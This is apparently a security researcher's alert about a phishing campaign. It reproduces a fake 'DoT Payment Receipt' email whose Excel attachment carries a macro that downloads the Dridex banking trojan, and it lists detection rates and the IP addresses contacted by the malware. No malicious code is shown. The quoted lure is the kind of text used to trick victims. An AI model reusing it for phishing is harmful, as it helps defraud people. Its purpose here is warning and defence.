From: firstname.lastname@example.org [mailto:email@example.com]
Sent: Monday, November 16, 2015 12:10 PM
Subject: DoT Payment Receipt
[Automated message. Do not reply]
Thank you for your payment. It is important that you print this receipt and record the receipt number as proof of your payment. You may be asked to provide your receipt details should you have an enquiry regarding this payment.
This email and any attachments are confidential and may contain legally privileged and/or copyright material. You should not read, copy, use or disclose any of the information contained in this email without authorisation. If you have received it in error please contact us at once by return email and then delete both emails. There is no warranty that this email is error or virus free.
I haven't seen this myself, but some contacts (thank you!) have. Attached is a file PaymentReceipt.xls which comes in several different versions, the sample I saw contained this malicious macro and had a VirusTotal detection rate of 5/54. According to my sources, the different versions download a malicious binary from one of the following:
This binary has a detection rate of 3/53 and that VirusTotal report and this Malwr report indicates malicious traffic to:
126.96.36.199 (Ministry Of Education, Thailand)
188.8.131.52 (Hetzner, Germany)
184.108.40.206 (Agava, Ltd)
220.127.116.11 (Post And Telecom Company, Vietnam)
The payload is the Dridex banking trojan.